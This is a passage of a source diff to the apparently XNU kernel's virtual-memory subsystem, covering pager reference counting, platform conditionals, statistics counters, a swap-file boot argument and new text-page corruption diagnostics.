NULL, 2); /* existence reference (for the cache) and another for the caller */ + /* one reference for the caller */ + os_ref_init_count_raw(&pager->ap_pgr_hdr_ref, NULL, 1); pager->is_mapped = FALSE; + if (cache_pager) { + /* extra reference for the cache */ + os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL); + pager->is_cached = true; + } else { + pager->is_cached = false; + } pager->backing_object = backing_object; pager->backing_offset = backing_offset; pager->crypto_backing_offset = crypto_backing_offset; @@ -1208,7 +1223,8 @@ apple_protect_pager_setup( vm_object_offset_t crypto_backing_offset, struct pager_crypt_info *crypt_info, vm_object_offset_t crypto_start, - vm_object_offset_t crypto_end) + vm_object_offset_t crypto_end, + boolean_t cache_pager) { apple_protect_pager_t pager; struct pager_crypt_info *old_crypt_info, *new_crypt_info; @@ -1295,7 +1311,7 @@ apple_protect_pager_setup( crypt_info_deallocate(old_crypt_info); assert(old_crypt_info->crypt_refcnt > 0); /* give extra reference on pager to the caller */ - os_ref_retain_locked(&pager->ref_count); + os_ref_retain_locked_raw(&pager->ap_pgr_hdr_ref, NULL); break; } } @@ -1335,7 +1351,8 @@ apple_protect_pager_setup( crypto_backing_offset, new_crypt_info, crypto_start, - crypto_end); + crypto_end, + cache_pager); } if (pager == APPLE_PROTECT_PAGER_NULL) { /* could not create a new pager */ @@ -1386,8 +1403,8 @@ apple_protect_pager_trim(void) { apple_protect_pager_t pager, prev_pager; queue_head_t trim_queue; - int num_trim; - int count_unmapped; + unsigned int num_trim; + unsigned int count_unmapped; lck_mtx_lock(&apple_protect_pager_lock); @@ -1407,7 +1424,8 @@ apple_protect_pager_trim(void) prev_pager = (apple_protect_pager_t) queue_prev(&pager->pager_queue); - if (os_ref_get_count(&pager->ref_count) == 2 && + if (pager->is_cached && + os_ref_get_count_raw(&pager->ap_pgr_hdr_ref) == 2 && pager->is_ready && !pager->is_mapped) { /* this pager can be trimmed */ @@ -1441,6 +1459,8 @@ apple_protect_pager_trim(void) pager, apple_protect_pager_t, pager_queue); + assert(pager->is_cached); + pager->is_cached = false; pager->pager_queue.next = NULL; pager->pager_queue.prev = NULL; /* @@ -1448,7 +1468,8 @@ apple_protect_pager_trim(void) * has already been dequeued, but we still need to remove * a reference. */ - os_ref_count_t __assert_only count = os_ref_release_locked(&pager->ref_count); + os_ref_count_t __assert_only count; + count = os_ref_release_locked_raw(&pager->ap_pgr_hdr_ref, NULL); assert(count == 1); apple_protect_pager_terminate_internal(pager); } diff --git a/osfmk/vm/vm_compressor.c b/osfmk/vm/vm_compressor.c index 92a53eb22..315c8b429 100644 --- a/osfmk/vm/vm_compressor.c +++ b/osfmk/vm/vm_compressor.c @@ -118,7 +118,7 @@ boolean_t validate_c_segs = TRUE; * the boot-arg & device-tree code. */ -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #if CONFIG_FREEZE int vm_compressor_mode = VM_PAGER_FREEZER_DEFAULT; @@ -127,10 +127,10 @@ struct freezer_context freezer_context_global; int vm_compressor_mode = VM_PAGER_NOT_CONFIGURED; #endif /* CONFIG_FREEZE */ -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ int vm_compressor_mode = VM_PAGER_COMPRESSOR_WITH_SWAP; -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ TUNABLE(uint32_t, vm_compression_limit, "vm_compression_limit", 0); int vm_compressor_is_active = 0; @@ -344,9 +344,9 @@ static void vm_compressor_do_delayed_compactions(boolean_t); static void vm_compressor_compact_and_swap(boolean_t); static void vm_compressor_age_swapped_in_segments(boolean_t); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static void vm_compressor_take_paging_space_action(void); -#endif +#endif /* XNU_TARGET_OS_OSX */ void compute_swapout_target_age(void); @@ -481,7 +481,7 @@ vm_wants_task_throttled(task_t task) TUNABLE(bool, kill_on_no_paging_space, "-kill_on_no_paging_space", false); #endif /* DEVELOPMENT || DEBUG */ -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static uint32_t no_paging_space_action_in_progress = 0; extern void memorystatus_send_low_swap_note(void); @@ -510,7 +510,7 @@ vm_compressor_take_paging_space_action(void) } } } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ void @@ -623,12 +623,12 @@ vm_compressor_init(void) assert((C_SEGMENTS_PER_PAGE * sizeof(union c_segu)) == PAGE_SIZE); -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX vm_compressor_minorcompact_threshold_divisor = 20; vm_compressor_majorcompact_threshold_divisor = 30; vm_compressor_unthrottle_threshold_divisor = 40; vm_compressor_catchup_threshold_divisor = 60; -#else +#else /* !XNU_TARGET_OS_OSX */ if (max_mem <= (3ULL * 1024ULL * 1024ULL * 1024ULL)) { vm_compressor_minorcompact_threshold_divisor = 11; vm_compressor_majorcompact_threshold_divisor = 13; @@ -640,7 +640,7 @@ vm_compressor_init(void) vm_compressor_unthrottle_threshold_divisor = 35; vm_compressor_catchup_threshold_divisor = 50; } -#endif +#endif /* !XNU_TARGET_OS_OSX */ queue_init(&c_bad_list_head); queue_init(&c_age_list_head); @@ -663,7 +663,7 @@ vm_compressor_init(void) compressor_pool_max_size = C_SEG_MAX_LIMIT; compressor_pool_max_size *= C_SEG_BUFSIZE; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (vm_compression_limit == 0) { if (max_mem <= (4ULL * 1024ULL * 1024ULL * 1024ULL)) { @@ -1309,14 +1309,14 @@ c_seg_switch_state(c_segment_t c_seg, int new_state, boolean_t insert_head) { int old_state = c_seg->c_state; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX #if DEVELOPMENT || DEBUG if (new_state != C_IS_FILLING) { LCK_MTX_ASSERT(&c_seg->c_lock, LCK_MTX_ASSERT_OWNED); } LCK_MTX_ASSERT(c_list_lock, LCK_MTX_ASSERT_OWNED); #endif -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ switch (old_state) { case C_IS_EMPTY: assert(new_state == C_IS_FILLING || new_state == C_IS_FREE); @@ -2195,6 +2195,13 @@ compressor_needs_to_swap(void) goto check_if_low_space; } } + +#if (XNU_TARGET_OS_OSX && __arm64__) + /* + * Thrashing detection disabled. + */ +#else /* (XNU_TARGET_OS_OSX && __arm64__) */ + compute_swapout_target_age(); if (swapout_target_age) { @@ -2219,6 +2226,7 @@ compressor_needs_to_swap(void) if (swapout_target_age) { should_swap = TRUE; } +#endif /* (XNU_TARGET_OS_OSX && __arm64__) */ check_if_low_space: @@ -2504,9 +2512,9 @@ vm_compressor_do_delayed_compactions(boolean_t flush_all) VM_DEBUG_CONSTANT_EVENT(vm_compressor_do_delayed_compactions, VM_COMPRESSOR_DO_DELAYED_COMPACTIONS, DBG_FUNC_START, c_minor_count, flush_all, 0, 0); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX LCK_MTX_ASSERT(c_list_lock, LCK_MTX_ASSERT_OWNED); -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ while (!queue_empty(&c_minor_list_head) && needs_to_swap == FALSE) { c_seg = (c_segment_t)queue_first(&c_minor_list_head); @@ -3286,11 +3294,11 @@ c_seg_allocate(c_segment_t *current_chead) int min_needed; int size_to_populate; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (vm_compressor_low_on_space()) { vm_compressor_take_paging_space_action(); } -#endif /* !CONFIG_EMBEDDED */ +#endif /* XNU_TARGET_OS_OSX */ if ((c_seg = *current_chead) == NULL) { uint32_t c_segno; @@ -4465,11 +4473,11 @@ done: vm_swap_consider_defragmenting(VM_SWAP_FLAGS_NONE); } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX if ((c_minor_count && COMPRESSOR_NEEDS_TO_MINOR_COMPACT()) || vm_compressor_needs_to_major_compact()) { vm_wake_compactor_swapper(); } -#endif +#endif /* !XNU_TARGET_OS_OSX */ return retval; } diff --git a/osfmk/vm/vm_compressor.h b/osfmk/vm/vm_compressor.h index 9b4cf69eb..f7191c457 100644 --- a/osfmk/vm/vm_compressor.h +++ b/osfmk/vm/vm_compressor.h @@ -468,13 +468,13 @@ extern void kdp_compressor_busy_find_owner(event64_t wait_event, thread_waitinfo #define VM_PAGE_COMPRESSOR_SWAP_CATCHUP_THRESHOLD (((AVAILABLE_MEMORY) * 10) / (vm_compressor_catchup_threshold_divisor ? vm_compressor_catchup_threshold_divisor : 10)) #define VM_PAGE_COMPRESSOR_HARD_THROTTLE_THRESHOLD (((AVAILABLE_MEMORY) * 9) / (vm_compressor_catchup_threshold_divisor ? vm_compressor_catchup_threshold_divisor : 9)) -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define AVAILABLE_NON_COMPRESSED_MIN 20000 #define COMPRESSOR_NEEDS_TO_SWAP() (((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_THRESHOLD) || \ (AVAILABLE_NON_COMPRESSED_MEMORY < AVAILABLE_NON_COMPRESSED_MIN)) ? 1 : 0) -#else +#else /* !XNU_TARGET_OS_OSX */ #define COMPRESSOR_NEEDS_TO_SWAP() ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_THRESHOLD) ? 1 : 0) -#endif +#endif /* !XNU_TARGET_OS_OSX */ #define HARD_THROTTLE_LIMIT_REACHED() ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_HARD_THROTTLE_THRESHOLD) ? 1 : 0) #define SWAPPER_NEEDS_TO_UNTHROTTLE() ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_UNTHROTTLE_THRESHOLD) ? 1 : 0) @@ -484,11 +484,11 @@ extern void kdp_compressor_busy_find_owner(event64_t wait_event, thread_waitinfo #define COMPRESSOR_NEEDS_TO_MINOR_COMPACT() ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_COMPACT_THRESHOLD) ? 1 : 0) -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define COMPRESSOR_FREE_RESERVED_LIMIT 28 -#else +#else /* !XNU_TARGET_OS_OSX */ #define COMPRESSOR_FREE_RESERVED_LIMIT 128 -#endif +#endif /* !XNU_TARGET_OS_OSX */ uint32_t vm_compressor_get_encode_scratch_size(void) __pure2; uint32_t vm_compressor_get_decode_scratch_size(void) __pure2; diff --git a/osfmk/vm/vm_compressor_backing_store.c b/osfmk/vm/vm_compressor_backing_store.c index 0c98c24a4..01a41f9de 100644 --- a/osfmk/vm/vm_compressor_backing_store.c +++ b/osfmk/vm/vm_compressor_backing_store.c @@ -127,7 +127,7 @@ extern int vnode_getwithref(struct vnode* vp); boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE; -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX /* * For CONFIG_FREEZE, we scale the c_segments_limit based on the @@ -145,7 +145,7 @@ boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE; ((cur_ts - vm_swapfile_last_failed_to_create_ts) > VM_SWAPFILE_DELAYED_CREATE) ? 1 : 0) #define VM_SWAP_SHOULD_TRIM(swf) ((swf->swp_delayed_trim_count >= VM_SWAPFILE_DELAYED_TRIM_MAX) ? 1 : 0) -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ #define VM_MAX_SWAP_FILE_NUM 100 #define VM_SWAPFILE_DELAYED_TRIM_MAX 128 @@ -156,7 +156,7 @@ boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE; ((cur_ts - vm_swapfile_last_failed_to_create_ts) > VM_SWAPFILE_DELAYED_CREATE) ? 1 : 0) #define VM_SWAP_SHOULD_TRIM(swf) ((swf->swp_delayed_trim_count >= VM_SWAPFILE_DELAYED_TRIM_MAX) ? 1 : 0) -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #define VM_SWAP_SHOULD_RECLAIM() (((vm_swap_force_reclaim == TRUE) || ((vm_swapfile_total_segs_alloced - vm_swapfile_total_segs_used) >= SWAPFILE_RECLAIM_THRESHOLD_SEGS)) ? 1 : 0) #define VM_SWAP_SHOULD_ABORT_RECLAIM() (((vm_swap_force_reclaim == FALSE) && ((vm_swapfile_total_segs_alloced - vm_swapfile_total_segs_used) <= SWAPFILE_RECLAIM_MINIMUM_SEGS)) ? 1 : 0) @@ -446,7 +446,7 @@ vm_compressor_swap_init() proc_set_thread_policy_with_tid(kernel_task, thread->thread_id, TASK_POLICY_INTERNAL, TASK_POLICY_PASSIVE_IO, TASK_POLICY_ENABLE); -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX /* * dummy value until the swap file gets created * when we drive the first c_segment_t to the @@ -454,9 +454,20 @@ vm_compressor_swap_init() * know the true size we have to work with */ c_overage_swapped_limit = 16; -#endif +#endif /* !XNU_TARGET_OS_OSX */ vm_num_swap_files_config = VM_MAX_SWAP_FILE_NUM; +#if DEVELOPMENT || DEBUG + typeof(vm_num_swap_files_config) parsed_vm_max_num_swap_files = 0; + if (PE_parse_boot_argn("vm_max_num_swap_files", &parsed_vm_max_num_swap_files, sizeof(parsed_vm_max_num_swap_files))) { + if (parsed_vm_max_num_swap_files > 0) { + vm_num_swap_files_config = parsed_vm_max_num_swap_files; + } else { + printf("WARNING: Ignoring vm_max_num_swap_files=%d boot-arg. Value must be > 0\n", parsed_vm_max_num_swap_files); + } + } +#endif + printf("Maximum number of VM swap files: %d\n", vm_num_swap_files_config); printf("VM Swap Subsystem is ON\n"); } @@ -534,14 +545,14 @@ vm_compaction_swapper_do_init(void) vm_compressor_catchup_threshold_divisor = 30; } } -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX vnode_setswapmount(vp); vm_swappin_avail = vnode_getswappin_avail(vp); if (vm_swappin_avail) { vm_swappin_enabled = TRUE; } -#endif +#endif /* XNU_TARGET_OS_OSX */ vm_swapfile_close((uint64_t)pathname, vp); } kheap_free(KHEAP_TEMP, pathname, namelen); @@ -1261,7 +1272,7 @@ vm_swapout_finish(c_segment_t c_seg, uint64_t f_offset, uint32_t size, kern_retu c_seg->c_store.c_swap_handle = f_offset; - VM_STAT_INCR_BY(swapouts, size >> PAGE_SHIFT); + counter_add(&vm_statistics_swapouts, size >> PAGE_SHIFT); if (c_seg->c_bytes_used) { OSAddAtomic64(-c_seg->c_bytes_used, &compressor_bytes_used); @@ -1421,7 +1432,7 @@ vm_swap_create_file() lck_mtx_unlock(&vm_swap_data_lock); thread_wakeup((event_t) &vm_num_swap_files); -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX if (vm_num_swap_files == 1) { c_overage_swapped_limit = (uint32_t)size / C_SEG_BUFSIZE; @@ -1429,7 +1440,7 @@ vm_swap_create_file() c_overage_swapped_limit /= 2; } } -#endif +#endif /* !XNU_TARGET_OS_OSX */ break; } else { size = size / 2; @@ -1487,7 +1498,7 @@ vm_swap_get(c_segment_t c_seg, uint64_t f_offset, uint64_t size) C_SEG_WRITE_PROTECT(c_seg); #endif if (retval == 0) { - VM_STAT_INCR_BY(swapins, size >> PAGE_SHIFT); + counter_add(&vm_statistics_swapins, size >> PAGE_SHIFT); } else { vm_swap_get_failures++; } @@ -2078,7 +2089,7 @@ ReTry_for_cseg: vnode_put(swf->swp_vp); } - VM_STAT_INCR_BY(swapins, c_size >> PAGE_SHIFT); + counter_add(&vm_statistics_swapins, c_size >> PAGE_SHIFT); if (vm_swap_put(addr, &f_offset, c_size, c_seg, NULL)) { vm_offset_t c_buffer; @@ -2105,7 +2116,7 @@ ReTry_for_cseg: goto swap_io_failed; } - VM_STAT_INCR_BY(swapouts, c_size >> PAGE_SHIFT); + counter_add(&vm_statistics_swapouts, c_size >> PAGE_SHIFT); lck_mtx_lock_spin_always(&c_seg->c_lock); diff --git a/osfmk/vm/vm_compressor_backing_store.h b/osfmk/vm/vm_compressor_backing_store.h index c8a03a235..da6f6e33c 100644 --- a/osfmk/vm/vm_compressor_backing_store.h +++ b/osfmk/vm/vm_compressor_backing_store.h @@ -37,19 +37,19 @@ #include #include -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define MIN_SWAP_FILE_SIZE (64 * 1024 * 1024ULL) #define MAX_SWAP_FILE_SIZE (128 * 1024 * 1024ULL) -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ #define MIN_SWAP_FILE_SIZE (256 * 1024 * 1024ULL) #define MAX_SWAP_FILE_SIZE (1 * 1024 * 1024 * 1024ULL) -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #define COMPRESSED_SWAP_CHUNK_SIZE (C_SEG_BUFSIZE) diff --git a/osfmk/vm/vm_compressor_pager.c b/osfmk/vm/vm_compressor_pager.c index 2b7dfe4bb..637798bfd 100644 --- a/osfmk/vm/vm_compressor_pager.c +++ b/osfmk/vm/vm_compressor_pager.c @@ -157,7 +157,11 @@ typedef struct compressor_pager { /* pager-specific data */ lck_mtx_t cpgr_lock; - unsigned int cpgr_references; +#if MEMORY_OBJECT_HAS_REFCOUNT +#define cpgr_references cpgr_hdr.mo_ref +#else + os_ref_atomic_t cpgr_references; +#endif unsigned int cpgr_num_slots; unsigned int cpgr_num_slots_occupied; union { @@ -340,8 +344,7 @@ compressor_memory_object_reference( } compressor_pager_lock(pager); - assert(pager->cpgr_references > 0); - pager->cpgr_references++; + os_ref_retain_locked_raw(&pager->cpgr_references, NULL); compressor_pager_unlock(pager); } @@ -365,7 +368,7 @@ compressor_memory_object_deallocate( } compressor_pager_lock(pager); - if (--pager->cpgr_references > 0) { + if (os_ref_release_locked_raw(&pager->cpgr_references, NULL) > 0) { compressor_pager_unlock(pager); return; } @@ -579,7 +582,7 @@ compressor_memory_object_create( } compressor_pager_lock_init(pager); - pager->cpgr_references = 1; + os_ref_init_raw(&pager->cpgr_references, NULL); pager->cpgr_num_slots = (uint32_t)(new_size / PAGE_SIZE); pager->cpgr_num_slots_occupied = 0; @@ -727,7 +730,7 @@ vm_compressor_pager_init(void) sizeof(struct compressor_pager), ZC_NOENCRYPT, ZONE_ID_ANY, ^(zone_t z){ #if defined(__LP64__) - zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP); + zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED); #else (void)z; #endif /* defined(__LP64__) */ @@ -739,7 +742,7 @@ vm_compressor_pager_init(void) compressor_slots_zones_names[idx], compressor_slots_zones_sizes[idx], ZC_NONE, ZONE_ID_ANY, ^(zone_t z){ - zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP); + zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED); }); } #endif /* defined(__LP64__) */ diff --git a/osfmk/vm/vm_fault.c b/osfmk/vm/vm_fault.c index 43814d16e..207a51413 100644 --- a/osfmk/vm/vm_fault.c +++ b/osfmk/vm/vm_fault.c @@ -77,7 +77,7 @@ #include #include -#include +#include #include #include #include @@ -137,6 +137,9 @@ extern struct vnode *vnode_pager_lookup_vnode(memory_object_t); uint64_t vm_hard_throttle_threshold; +#if DEBUG || DEVELOPMENT +static bool vmtc_panic_instead = false; +#endif /* DEBUG || DEVELOPMENT */ OS_ALWAYS_INLINE boolean_t @@ -157,7 +160,7 @@ NEED_TO_HARD_THROTTLE_THIS_TASK(void) #define VM_STAT_DECOMPRESSIONS() \ MACRO_BEGIN \ - VM_STAT_INCR(decompressions); \ + counter_inc(&vm_statistics_decompressions); \ current_thread()->decompressions++; \ MACRO_END @@ -280,6 +283,10 @@ vm_fault_init(void) PE_parse_boot_argn("vm_protect_privileged_from_untrusted", &vm_protect_privileged_from_untrusted, sizeof(vm_protect_privileged_from_untrusted)); + +#if DEBUG || DEVELOPMENT + (void)PE_parse_boot_argn("text_corruption_panic", &vmtc_panic_instead, sizeof(vmtc_panic_instead)); +#endif /* DEBUG || DEVELOPMENT */ } __startup_func @@ -831,7 +838,7 @@ vm_fault_zero_page(vm_page_t m, boolean_t no_zero_fill) } else { vm_page_zero_fill(m); - VM_STAT_INCR(zero_fill_count); + counter_inc(&vm_statistics_zero_fill_count); DTRACE_VM2(zfod, int, 1, (uint64_t *), NULL); } assert(!m->vmp_laundry); @@ -1113,8 +1120,6 @@ vm_fault_page( #endif wait_result = PAGE_SLEEP(object, m, interruptible); - counter(c_vm_fault_page_block_busy_kernel++); - if (wait_result != THREAD_AWAKENED) { vm_fault_cleanup(object, first_m); thread_interrupt_level(interruptible_state); @@ -1334,7 +1339,6 @@ vm_fault_page( vm_fault_cleanup(object, first_m); - counter(c_vm_fault_page_block_backoff_kernel++); vm_object_lock(object); assert(object->ref_count > 0); @@ -1493,7 +1497,6 @@ vm_fault_page( */ vm_object_reference_locked(object); vm_fault_cleanup(object, first_m); - counter(c_vm_fault_page_block_backoff_kernel++); vm_object_lock(object); assert(object->ref_count > 0); @@ -1535,8 +1538,6 @@ vm_fault_page( vm_fault_cleanup(object, first_m); - counter(c_vm_fault_page_block_backoff_kernel++); - vm_object_lock(object); assert(object->ref_count > 0); @@ -2075,7 +2076,7 @@ dont_look_for_page: vm_object_unlock(object); my_fault = DBG_COW_FAULT; - VM_STAT_INCR(cow_faults); + counter_inc(&vm_statistics_cow_faults); DTRACE_VM2(cow_fault, int, 1, (uint64_t *), NULL); current_task()->cow_faults++; @@ -2194,11 +2195,9 @@ dont_look_for_page: vm_object_reference_locked(copy_object); vm_object_unlock(copy_object); vm_fault_cleanup(object, first_m); - counter(c_vm_fault_page_block_backoff_kernel++); vm_object_lock(copy_object); assert(copy_object->ref_count > 0); - VM_OBJ_RES_DECR(copy_object); vm_object_lock_assert_exclusive(copy_object); copy_object->ref_count--; assert(copy_object->ref_count > 0); @@ -2237,7 +2236,6 @@ dont_look_for_page: if (copy_m == VM_PAGE_NULL) { RELEASE_PAGE(m); - VM_OBJ_RES_DECR(copy_object); vm_object_lock_assert_exclusive(copy_object); copy_object->ref_count--; assert(copy_object->ref_count > 0); @@ -2353,7 +2351,6 @@ dont_look_for_page: copy_object->ref_count--; assert(copy_object->ref_count > 0); - VM_OBJ_RES_DECR(copy_object); vm_object_unlock(copy_object); break; @@ -4004,8 +4001,8 @@ vm_fault_internal( fault_type = (change_wiring ? VM_PROT_NONE : caller_prot); - VM_STAT_INCR(faults); - current_task()->faults++; + counter_inc(&vm_statistics_faults); + counter_inc(¤t_task()->faults); original_fault_type = fault_type; need_copy = FALSE; @@ -4323,8 +4320,6 @@ RetryFault: if (result == THREAD_WAITING) { result = thread_block(THREAD_CONTINUE_NULL); - - counter(c_vm_fault_page_block_busy_kernel++); } if (result == THREAD_AWAKENED || result == THREAD_RESTART) { goto RetryFault; @@ -4793,7 +4788,7 @@ FastPmapEnter: vm_fault_collapse_total++; type_of_fault = DBG_COW_FAULT; - VM_STAT_INCR(cow_faults); + counter_inc(&vm_statistics_cow_faults); DTRACE_VM2(cow_fault, int, 1, (uint64_t *), NULL); current_task()->cow_faults++; @@ -5187,7 +5182,7 @@ FastPmapEnter: * lock across the zero fill. */ vm_page_zero_fill(m); - VM_STAT_INCR(zero_fill_count); + counter_inc(&vm_statistics_zero_fill_count); DTRACE_VM2(zfod, int, 1, (uint64_t *), NULL); } if (page_needs_data_sync) { @@ -6302,10 +6297,10 @@ vm_fault_wire_fast( vm_map_offset_t fault_phys_offset; struct vm_object_fault_info fault_info = {}; - VM_STAT_INCR(faults); + counter_inc(&vm_statistics_faults); if (thread != THREAD_NULL && thread->task != TASK_NULL) { - thread->task->faults++; + counter_inc(&thread->task->faults); } /* @@ -7229,13 +7224,11 @@ vm_page_validate_cs_mapped( } } -void -vm_page_validate_cs( - vm_page_t page, - vm_map_size_t fault_page_size, - vm_map_offset_t fault_phys_offset) +static void +vm_page_map_and_validate_cs( + vm_object_t object, + vm_page_t page) { - vm_object_t object; vm_object_offset_t offset; vm_map_offset_t koffset; vm_map_size_t ksize; @@ -7244,12 +7237,6 @@ vm_page_validate_cs( boolean_t busy_page; boolean_t need_unmap; - object = VM_PAGE_OBJECT(page); - vm_object_lock_assert_held(object); - - if (vm_page_validate_cs_fast(page, fault_page_size, fault_phys_offset)) { - return; - } vm_object_lock_assert_exclusive(object); assert(object->code_signed); @@ -7305,6 +7292,23 @@ vm_page_validate_cs( vm_object_paging_end(object); } +void +vm_page_validate_cs( + vm_page_t page, + vm_map_size_t fault_page_size, + vm_map_offset_t fault_phys_offset) +{ + vm_object_t object; + + object = VM_PAGE_OBJECT(page); + vm_object_lock_assert_held(object); + + if (vm_page_validate_cs_fast(page, fault_page_size, fault_phys_offset)) { + return; + } + vm_page_map_and_validate_cs(object, page); +} + void vm_page_validate_cs_mapped_chunk( vm_page_t page, @@ -7477,3 +7481,550 @@ vmrtf_extract(uint64_t cupid, __unused boolean_t isroot, unsigned long vrecordsz *vmrtfrv = numextracted; return early_exit; } + +/* + * Only allow one diagnosis to be in flight at a time, to avoid + * creating too much additional memory usage. + */ +static volatile uint_t vmtc_diagnosing; +unsigned int vmtc_total; +unsigned int vmtc_undiagnosed; +unsigned int vmtc_not_eligible; +unsigned int vmtc_copyin_fail; +unsigned int vmtc_not_found; +unsigned int vmtc_one_bit_flip; +unsigned int vmtc_byte_counts[MAX_TRACK_POWER2 + 1]; + +#if DEVELOPMENT || DEBUG +/* + * Keep around the last diagnosed corruption buffers to aid in debugging. + */ +static size_t vmtc_last_buffer_size; +static uint64_t *vmtc_last_before_buffer = NULL; +static uint64_t *vmtc_last_after_buffer = NULL; +#endif /* DEVELOPMENT || DEBUG */ + +/* + * Set things up so we can diagnose a potential text page corruption. + */ +static uint64_t * +vmtc_text_page_diagnose_setup( + vm_map_offset_t code_addr) +{ + uint64_t *buffer; + size_t size = MIN(vm_map_page_size(current_map()), PAGE_SIZE); + + (void)OSAddAtomic(1, &vmtc_total); + + /* + * If another is being diagnosed, skip this one. + */ + if (!OSCompareAndSwap(0, 1, &vmtc_diagnosing)) { + (void)OSAddAtomic(1, &vmtc_undiagnosed); + return NULL; + } + + /* + * Get the contents of the corrupt page. + */ + buffer = kheap_alloc(KHEAP_DEFAULT, size, Z_WAITOK); + if (copyin((user_addr_t)vm_map_trunc_page(code_addr, size - 1), buffer, size) != 0) { + /* copyin error, so undo things */ + kheap_free(KHEAP_DEFAULT, buffer, size); + (void)OSAddAtomic(1, &vmtc_undiagnosed); + ++vmtc_copyin_fail; + if (!OSCompareAndSwap(1, 0, &vmtc_diagnosing)) { + panic("Bad compare and swap in setup!"); + } + return NULL; + } + return buffer; +} + +/* + * Diagnose the text page by comparing its contents with + * the one we've previously saved. + */ +static void +vmtc_text_page_diagnose( + vm_map_offset_t code_addr, + uint64_t *old_code_buffer) +{ + uint64_t *new_code_buffer; + size_t size = MIN(vm_map_page_size(current_map()), PAGE_SIZE); + uint_t count = (uint_t)size / sizeof(uint64_t); + uint_t diff_count = 0; + bool bit_flip = false; + uint_t b; + uint64_t *new; + uint64_t *old; + + new_code_buffer = kheap_alloc(KHEAP_DEFAULT, size, Z_WAITOK); + if (copyin((user_addr_t)vm_map_trunc_page(code_addr, size - 1), new_code_buffer, size) != 0) { + /* copyin error, so undo things */ + (void)OSAddAtomic(1, &vmtc_undiagnosed); + ++vmtc_copyin_fail; + goto done; + } + + new = new_code_buffer; + old = old_code_buffer; + for (; count-- > 0; ++new, ++old) { + if (*new == *old) { + continue; + } + + /* + * On first diff, check for a single bit flip + */ + if (diff_count == 0) { + uint64_t x = (*new ^ *old); + assert(x != 0); + if ((x & (x - 1)) == 0) { + bit_flip = true; + ++diff_count; + continue; + } + } + + /* + * count up the number of different bytes. + */ + for (b = 0; b < sizeof(uint64_t); ++b) { + char *n = (char *)new; + char *o = (char *)old; + if (n[b] != o[b]) { + ++diff_count; + } + } + + /* quit counting when too many */ + if (diff_count > (1 << MAX_TRACK_POWER2)) { + break; + } + } + + if (diff_count > 1) { + bit_flip = false; + } + + if (diff_count == 0) { + ++vmtc_not_found; + } else if (bit_flip) { + ++vmtc_one_bit_flip; + ++vmtc_byte_counts[0]; + } else { + for (b = 0; b <= MAX_TRACK_POWER2; ++b) { + if (diff_count <= (1 << b)) { + ++vmtc_byte_counts[b]; + break; + } + } + if (diff_count > (1 << MAX_TRACK_POWER2)) { + ++vmtc_byte_counts[MAX_TRACK_POWER2]; + } + } + +done: + /* + * Free up the code copy buffers, but save the last + * set on development / debug kernels in case they + * can provide evidence for debugging memory stomps. + */ +#if DEVELOPMENT || DEBUG + if (vmtc_last_before_buffer != NULL) { + kheap_free(KHEAP_DEFAULT, vmtc_last_before_buffer, vmtc_last_buffer_size); + } + if (vmtc_last_after_buffer != NULL) { + kheap_free(KHEAP_DEFAULT, vmtc_last_after_buffer, vmtc_last_buffer_size); + } + vmtc_last_before_buffer = old_code_buffer; + vmtc_last_after_buffer = new_code_buffer; + vmtc_last_buffer_size = size; +#else /* DEVELOPMENT || DEBUG */ + kheap_free(KHEAP_DEFAULT, new_code_buffer, size); + kheap_free(KHEAP_DEFAULT, old_code_buffer, size); +#endif /* DEVELOPMENT || DEBUG */ + + /* + * We're finished, so clear the diagnosing flag. + */ + if (!OSCompareAndSwap(1, 0, &vmtc_diagnosing)) { + panic("Bad compare and swap in diagnose!"); + } +} + +/* + * For the given map, virt address, find the object, offset, and page. + * This has to lookup the map entry, verify protections, walk any shadow chains. + * If found, returns with the object locked. + */ +static kern_return_t +vmtc_revalidate_lookup( + vm_map_t map, + vm_map_offset_t 